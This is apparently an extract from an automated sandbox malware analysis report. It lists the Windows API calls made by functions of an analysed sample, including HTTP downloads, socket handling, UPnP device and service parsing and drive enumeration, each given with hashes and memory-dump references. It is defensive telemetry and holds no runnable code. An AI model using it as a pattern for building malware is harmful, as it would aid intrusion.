                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Interlocked$CloseCriticalSection$DecrementEventHandle$CompletionDeleteEnterExchangeIncrementLeavePostQueuedStatus
                                                                                                                                    • String ID: PCOI$ilci
                                                                                                                                    • API String ID: 2403999931-3762367603
                                                                                                                                    • Opcode ID: 8d3037cf696ecd8756279fad8891fdfc713d08fe7f166539a7d0865b035c0410
                                                                                                                                    • Instruction ID: 00719830d96ac068de130eecfd85e1b44ef6fd60ec2c55820453df0d9b8f54e2
                                                                                                                                    • Opcode Fuzzy Hash: 8d3037cf696ecd8756279fad8891fdfc713d08fe7f166539a7d0865b035c0410
                                                                                                                                    • Instruction Fuzzy Hash: B731A671900705ABC710AF70EC48B97B7B8BF09300F048A2AE569A7691D779F894CB98

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                    • memset.NTDLL ref: 004058D8
                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004058F0
                                                                                                                                    • Sleep.KERNEL32(00000001), ref: 00405904
                                                                                                                                    • GetTickCount.KERNEL32 ref: 0040590A
                                                                                                                                    • GetTickCount.KERNEL32 ref: 00405913
                                                                                                                                    • wsprintfW.USER32 ref: 00405926
                                                                                                                                    • RegisterClassExW.USER32(00000030), ref: 00405933
                                                                                                                                    • CreateWindowExW.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,?,00000000), ref: 0040595C
                                                                                                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00405977
                                                                                                                                    • TranslateMessage.USER32(?), ref: 00405985
                                                                                                                                    • DispatchMessageA.USER32(?), ref: 0040598F
                                                                                                                                    • ExitThread.KERNEL32 ref: 004059A1
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Message$CountTick$ClassCreateDispatchExitHandleModuleRegisterSleepThreadTranslateWindowmemsetwsprintf
                                                                                                                                    • String ID: %x%X$0
                                                                                                                                    • API String ID: 716646876-225668902
                                                                                                                                    • Opcode ID: 03a63f419c221d19dc1f4a22be05731f57d92fe9a42c49428073284f968a398b
                                                                                                                                    • Instruction ID: bd9536bbadbf21864e97b89de5b907373c0f6f38ddabaab6f1c3dd09ba998754
                                                                                                                                    • Opcode Fuzzy Hash: 03a63f419c221d19dc1f4a22be05731f57d92fe9a42c49428073284f968a398b
• Instruction Fuzzy Hash: C7211AB1940308FBEB109BA0DD49FEE7B78EB04711F14852AF601BA1D0DBB99544CF69
APIs
• memset.NTDLL ref: 0040E668
• InternetCrackUrlA.WININET(0040E119,00000000,10000000,0000003C), ref: 0040E6B8
• InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040E6C8
• InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040E701
• HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040E737
• HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040E75F
• InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040E7A8
• memcpy.NTDLL(00000000,?,00000000), ref: 0040E7FA
• InternetCloseHandle.WININET(00000000), ref: 0040E837
• InternetCloseHandle.WININET(00000000), ref: 0040E844
• InternetCloseHandle.WININET(00000000), ref: 0040E851
Strings
Memory Dump Source
• Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_33080.jbxd
Yara matches
Similarity
• API ID: Internet$CloseHandle$HttpOpenRequest$ConnectCrackFileReadSendmemcpymemset
• String ID: <$GET
• API String ID: 1205665004-427699995
• Opcode ID: 74e573df251a3fdd9775996cb884078f57aebd0a6693bdda84868dee8850155f
• Instruction ID: bd69c55cfb2b9f93b8bf7ceaaaaaf86fc3309545456039a657a23fe3286800e0
• Opcode Fuzzy Hash: 74e573df251a3fdd9775996cb884078f57aebd0a6693bdda84868dee8850155f
• Instruction Fuzzy Hash: F75109B1A41228ABDB36DB50CC55BE973BCAB44705F0484E9E60DAA2C0D7B96BC4CF54
APIs
• CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040F272
• CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040F293
• MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040F2B2
• GetFileSize.KERNEL32(000000FF,00000000), ref: 0040F2CB
• memcmp.NTDLL ref: 0040F35D
• UnmapViewOfFile.KERNEL32(00000000), ref: 0040F380
• CloseHandle.KERNEL32(00000000), ref: 0040F38A
• CloseHandle.KERNEL32(000000FF), ref: 0040F394
• CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040F3B3
• WriteFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 0040F3D8
• CloseHandle.KERNEL32(000000FF), ref: 0040F3E2
Memory Dump Source
• Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_33080.jbxd
Yara matches
Similarity
• API ID: File$CloseCreateHandle$View$MappingSizeUnmapWritememcmp
• String ID:
• API String ID: 3902698870-0
• Opcode ID: 397832f4b3c545954de9817604727ce70a7a27c44a74f567f7741af6b4247064
• Instruction ID: 91565a6fedc79cda49cfd97bae5198494bb6489b7e374c7f74ac69d8e3e388a5
• Opcode Fuzzy Hash: 397832f4b3c545954de9817604727ce70a7a27c44a74f567f7741af6b4247064
• Instruction Fuzzy Hash: 75514BB4E40308FBDB24DBA4CC49F9EB774AB48304F108569F611B72C0D7B9AA44CB98
APIs
• GetCurrentThread.KERNEL32 ref: 0040DD56
• GetThreadPriority.KERNEL32(00000000,?,?,?,00408480,?,000000FF), ref: 0040DD5D
• GetCurrentThread.KERNEL32 ref: 0040DD68
• SetThreadPriority.KERNEL32(00000000,?,?,?,00408480,?,000000FF), ref: 0040DD6F
• InterlockedExchangeAdd.KERNEL32(00408480,00000000), ref: 0040DD92
• EnterCriticalSection.KERNEL32(000000FB), ref: 0040DDC7
• WaitForSingleObject.KERNEL32(000000FF,00000000), ref: 0040DE12
• LeaveCriticalSection.KERNEL32(000000FB), ref: 0040DE2E
• Sleep.KERNEL32(00000001), ref: 0040DE5E
• GetCurrentThread.KERNEL32 ref: 0040DE6D
• SetThreadPriority.KERNEL32(00000000,?,?,?,00408480), ref: 0040DE74
Memory Dump Source
• Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_33080.jbxd
Yara matches
Similarity
• API ID: Thread$CurrentPriority$CriticalSection$EnterExchangeInterlockedLeaveObjectSingleSleepWait
• String ID:
• API String ID: 3862671961-0
• Opcode ID: 5618e667e755a89869c685173e38bf799e2d1f6c3c7819217eae43ff0fa2d7e3
• Instruction ID: 15ec6ce41066bd2df298828df26a4308ea05a03792f046612c1f6ffbd780898a
• Opcode Fuzzy Hash: 5618e667e755a89869c685173e38bf799e2d1f6c3c7819217eae43ff0fa2d7e3
• Instruction Fuzzy Hash: 1B412C74E00209DBDB04DFE4D844BAEBB71FF54315F108169E916AB381D7789A84CF99
APIs
• InterlockedExchange.KERNEL32(?,00000000), ref: 00401D86
• InterlockedDecrement.KERNEL32(?), ref: 00401DB0
• InterlockedDecrement.KERNEL32(?), ref: 00401DC3
• InterlockedExchangeAdd.KERNEL32(?,?), ref: 00401DD4
• InterlockedDecrement.KERNEL32(?), ref: 00401E5B
• InterlockedDecrement.KERNEL32(?), ref: 00401EF6
• setsockopt.WS2_32 ref: 00401F2C
• closesocket.WS2_32(?), ref: 00401F39
  • Part of subcall function 0040DF20: NtQuerySystemTime.NTDLL(0040BD65), ref: 0040DF2A
  • Part of subcall function 0040DF20: RtlTimeToSecondsSince1980.NTDLL(0040BD65,?), ref: 0040DF38
Memory Dump Source
• Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_33080.jbxd
Yara matches
Similarity
• API ID: Interlocked$Decrement$ExchangeTime$QuerySecondsSince1980Systemclosesocketsetsockopt
• String ID:
• API String ID: 671207744-0
• Opcode ID: 8dc138b45ca20bf30cfdef2e37b67658010477f0f0075654919bb451a9b4aa4a
• Instruction ID: f2cbb4ded8662be063e38a6044f3a63d93470e371ff4fbf655dea468244fd3f8
• Opcode Fuzzy Hash: 8dc138b45ca20bf30cfdef2e37b67658010477f0f0075654919bb451a9b4aa4a
• Instruction Fuzzy Hash: 4F51B075608702ABC704DF29D888B9BFBE5BF88314F40862EF85D93360D774A545CB96
APIs
• recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040E35E
• Sleep.KERNEL32(000003E8), ref: 0040E36E
• StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040E38B
• StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040E3A1
• StrChrA.SHLWAPI(?,0000000D), ref: 0040E3CE
Strings
Memory Dump Source
• Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_33080.jbxd
Yara matches
Similarity
• API ID: Sleeprecvfrom
• String ID: HTTP/1.1 200 OK$LOCATION:
• API String ID: 668330359-3973262388
• Opcode ID: adc9e1b642c8ef13301026d6139dd454e63dc363d970614d04e973e17512e1fe
• Instruction ID: e67ba9521a541be798431772fb319970cc3d6429c6b3b7a9c3ce28b53cac335a
• Opcode Fuzzy Hash: adc9e1b642c8ef13301026d6139dd454e63dc363d970614d04e973e17512e1fe
• Instruction Fuzzy Hash: 5E2130B0940218ABDB20CB65DC45BE9BB74AB04308F1085E9EB19B72C0D7B95AD6CF5D
APIs
• InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36,00000001,00000000,00000000,00000000), ref: 0040F4C7
• InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040F4E6
• HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 0040F50F
• InternetCloseHandle.WININET(00000000), ref: 0040F538
• InternetCloseHandle.WININET(00000000), ref: 0040F542
• Sleep.KERNEL32(000003E8), ref: 0040F54D
Strings
• Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36, xrefs: 0040F4C2
Memory Dump Source
• Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_33080.jbxd
Yara matches
Similarity
• API ID: Internet$CloseHandleOpen$HttpInfoQuerySleep
• String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
• API String ID: 2743515581-2960703779
• Opcode ID: eac7a16544c45e3c29eec32ac406d7a69024a54342cccca2c138cb753e28bf4a
• Instruction ID: af5d65e8d2fa993cc87ce820da5284d466d7432e490674ab1d3698c460306143
• Opcode Fuzzy Hash: eac7a16544c45e3c29eec32ac406d7a69024a54342cccca2c138cb753e28bf4a
• Instruction Fuzzy Hash: E7212975A40308BBDB20DF94CC49FEEB7B5AB04705F1084A5EA11AB2C0C7B9AA84CB55
APIs
• InitializeCriticalSection.KERNEL32(004165F8,?,?,?,?,?,?,00408403), ref: 0040BC7B
• CreateFileW.KERNEL32(004163E0,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040BCCD
• CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040BCEE
• MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040BD0D
• GetFileSize.KERNEL32(000000FF,00000000), ref: 0040BD22
• UnmapViewOfFile.KERNEL32(00000000), ref: 0040BD88
• CloseHandle.KERNEL32(00000000), ref: 0040BD92
• CloseHandle.KERNEL32(000000FF), ref: 0040BD9C
  • Part of subcall function 0040DF20: NtQuerySystemTime.NTDLL(0040BD65), ref: 0040DF2A
  • Part of subcall function 0040DF20: RtlTimeToSecondsSince1980.NTDLL(0040BD65,?), ref: 0040DF38
Memory Dump Source
• Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_33080.jbxd
Yara matches
Similarity
• API ID: File$CloseCreateHandleTimeView$CriticalInitializeMappingQuerySecondsSectionSince1980SizeSystemUnmap
• String ID:
• API String ID: 439099756-0
• Opcode ID: 95b7ad4b48b2612a2ac74941d1961fd8d23959eee21eec156b7f746c57c5f411
• Instruction ID: 789285c27e92e60cc42243599a26330008c438e37824d2da8ff51af530b364ad
                                                                                                                                    • Opcode Fuzzy Hash: 95b7ad4b48b2612a2ac74941d1961fd8d23959eee21eec156b7f746c57c5f411
                                                                                                                                    • Instruction Fuzzy Hash: 0F413A74E40309EBDB10EBA4DC4ABAEB774EB44705F20856AF6117A2C1C7B96941CB9C
APIs
• InitializeCriticalSection.KERNEL32(00415B88,?,?,?,?,?,004083CD), ref: 00405C0B
• CreateFileW.KERNEL32(00415FC8,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,004083CD), ref: 00405C25
• CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 00405C46
• MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00405C65
• GetFileSize.KERNEL32(000000FF,00000000), ref: 00405C7E
• UnmapViewOfFile.KERNEL32(00000000), ref: 00405D0B
• CloseHandle.KERNEL32(00000000), ref: 00405D15
• CloseHandle.KERNEL32(000000FF), ref: 00405D1F
Memory Dump Source
• Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_33080.jbxd
Similarity
• API ID: File$CloseCreateHandleView$CriticalInitializeMappingSectionSizeUnmap
• String ID:
• API String ID: 3956458805-0
• Opcode ID: d5d83b1f14bbe53c7a306cab709472362fb8432e959898be764c548cb6fd93a9
• Instruction ID: 999418e1eeb904d95552c7fd1475d0c30f1e1fd8627807f9f1e65d0b0efdc9c4
• Opcode Fuzzy Hash: d5d83b1f14bbe53c7a306cab709472362fb8432e959898be764c548cb6fd93a9
• Instruction Fuzzy Hash: DE310E74E40209EBDB14DBA4DC49FAFB774EB48700F20856AE6017B2C0D7B96941CF99

APIs
• EnterCriticalSection.KERNEL32(00415B88,00000000,0040C2A2,006A0266,?,0040C2BE,00000000,0040D66C,?), ref: 004060AF
• memcpy.NTDLL(?,00000000,00000100), ref: 00406141
• CreateFileW.KERNEL32(00415FC8,40000000,00000000,00000000,00000002,00000002,00000000), ref: 00406265
• WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 004062C7
• FlushFileBuffers.KERNEL32(000000FF), ref: 004062D3
• CloseHandle.KERNEL32(000000FF), ref: 004062DD
• LeaveCriticalSection.KERNEL32(00415B88,?,?,?,?,?,?,0040C2BE,00000000,0040D66C,?), ref: 004062E8
Memory Dump Source
• Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_33080.jbxd
Similarity
• API ID: File$CriticalSection$BuffersCloseCreateEnterFlushHandleLeaveWritememcpy
• String ID:
• API String ID: 1457358591-0
• Opcode ID: e72a487dce04114ef622edc0900d7397c89588e022fce289eeb1184eb778240f
• Instruction ID: a605c5c2860c2acc1241a09a2373603bf375adc509756cd8cb030c585388e075
• Opcode Fuzzy Hash: e72a487dce04114ef622edc0900d7397c89588e022fce289eeb1184eb778240f
• Instruction Fuzzy Hash: D171BCB4E042099FCB04DF94D981FEFB7B1AF88304F14816DE506AB381D779A951CBA9

APIs
• lstrcmpiW.KERNEL32(00000000,device), ref: 0040ED7C
• lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040EDCB
• SysFreeString.OLEAUT32(00000000), ref: 0040EDDF
• SysFreeString.OLEAUT32(00000000), ref: 0040EDF7
Memory Dump Source
• Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_33080.jbxd
Similarity
• API ID: FreeStringlstrcmpi
• String ID: device$deviceType
• API String ID: 1602765415-3511266565
• Opcode ID: a9e600dac57c6bff42fbd44a0ab5cbd0dab53693824f3ca44f5ffdbb74c8a893
• Instruction ID: 03739fb7cbf0ac8b4f24cf275543a684364e3b5b0ef8f18e7a9da7a5ef98527e
• Opcode Fuzzy Hash: a9e600dac57c6bff42fbd44a0ab5cbd0dab53693824f3ca44f5ffdbb74c8a893
• Instruction Fuzzy Hash: 1A413A75A0020ADFCB04DF99D884BAFB7B5FF48304F108969E505A7390D778AA91CB95

APIs
• lstrcmpiW.KERNEL32(00000000,service), ref: 0040EC1C
• lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040EC6B
• SysFreeString.OLEAUT32(00000000), ref: 0040EC7F
• SysFreeString.OLEAUT32(00000000), ref: 0040EC97
Memory Dump Source
• Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_33080.jbxd
Similarity
• API ID: FreeStringlstrcmpi
• String ID: service$serviceType
• API String ID: 1602765415-3667235276
• Opcode ID: 5f17999700f738b1f8b02f544927b29f5482ea2caa1df498b33a2fd0fcdce1b7
• Instruction ID: 010777473a756836e58c8d4bedbd534eac8e5d19c37eb4cb5fbe46cee8795b1d
• Opcode Fuzzy Hash: 5f17999700f738b1f8b02f544927b29f5482ea2caa1df498b33a2fd0fcdce1b7
• Instruction Fuzzy Hash: 9F416A74A0020ADFDB04CF99C884BAFB7B9BF48304F108969E505B7390D779AE81CB95

APIs
• EnterCriticalSection.KERNEL32(?,?,?,?,?,004019BB,00000000), ref: 004022DA
• LeaveCriticalSection.KERNEL32(?,?,?,004019BB,00000000), ref: 004022FE
Memory Dump Source
• Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_33080.jbxd
Similarity
• API ID: CriticalSection$EnterLeave
• String ID:
• API String ID: 3168844106-0
• Opcode ID: 3ac2f8f5af7b0d3c40b8ef892d708a394eff8d7b565022b2108cc4f7acf51177
• Instruction ID: a453b5b0d0ea6fd4c501cc83d62b7a74cd48d0bc9ee55fa6e36116878b1ddbe7
• Opcode Fuzzy Hash: 3ac2f8f5af7b0d3c40b8ef892d708a394eff8d7b565022b2108cc4f7acf51177
• Instruction Fuzzy Hash: D231D1722012059BC710AFB5ED8CAE7B7A8FB44314F04863EE55AD3280DB78A4449BA9

APIs
• lstrcmpiW.KERNEL32(00000000,device), ref: 0040ED7C
• lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040EDCB
• SysFreeString.OLEAUT32(00000000), ref: 0040EDDF
• SysFreeString.OLEAUT32(00000000), ref: 0040EDF7
Memory Dump Source
• Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_33080.jbxd
Similarity
• API ID: FreeStringlstrcmpi
• String ID: device$deviceType
• API String ID: 1602765415-3511266565
• Opcode ID: c6fd2f803c2933f412baf75b0cc734dbcdbc8a3f85456721b664ef36854a057b
• Instruction ID: 82367b585ef85f09a19fbcbd702cec43aacbd83c2379c0e5ae25b899a50ddae9
• Opcode Fuzzy Hash: c6fd2f803c2933f412baf75b0cc734dbcdbc8a3f85456721b664ef36854a057b
• Instruction Fuzzy Hash: F1313970A0020ADFCB14CF99D884BEFB7B5FF88304F108969E514A7390D778AA91CB95

APIs
• lstrcmpiW.KERNEL32(00000000,service), ref: 0040EC1C
• lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040EC6B
• SysFreeString.OLEAUT32(00000000), ref: 0040EC7F
• SysFreeString.OLEAUT32(00000000), ref: 0040EC97
Memory Dump Source
• Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_33080.jbxd
Similarity
• API ID: FreeStringlstrcmpi
• String ID: service$serviceType
• API String ID: 1602765415-3667235276
• Opcode ID: fbd28e8abd5f6cdc19dfc357c6f3e47e72171285df1c210c36e8075dc31c5cfb
• Instruction ID: b0af1682f63206834f838cc0e71cdea1734b5e967c65deefb948a4066f0743c7
• Opcode Fuzzy Hash: fbd28e8abd5f6cdc19dfc357c6f3e47e72171285df1c210c36e8075dc31c5cfb
• Instruction Fuzzy Hash: 09312874A0420A9FDB04CF99C884BEFB7B5BF48304F108969E615B7390D779AA81CB95

                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Sleep$CacheDeleteEntrywsprintf
                                                                                                                                    • String ID: %s%s
                                                                                                                                    • API String ID: 1447977647-3252725368
                                                                                                                                    • Opcode ID: 0f885536a534958de828f6dadf3c238a14188cbeabebc74b6a6376721a3f9b9c
                                                                                                                                    • Instruction ID: a96cc5071c69656b1b6f4b00c6699880e4d6530ea1aa1078cf67c052952084b8
                                                                                                                                    • Opcode Fuzzy Hash: 0f885536a534958de828f6dadf3c238a14188cbeabebc74b6a6376721a3f9b9c
                                                                                                                                    • Instruction Fuzzy Hash: 643116B0C01218DFCB50DFA8DC887EDBBB4BB48304F1085AAE609B6290D7795AC4CF59
                                                                                                                                    APIs
                                                                                                                                    • GetLogicalDrives.KERNEL32 ref: 004063E6
                                                                                                                                    • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00406434
                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00406461
                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0040647E
                                                                                                                                    Strings
                                                                                                                                    • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, xrefs: 00406427
                                                                                                                                    • NoDrives, xrefs: 00406458
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
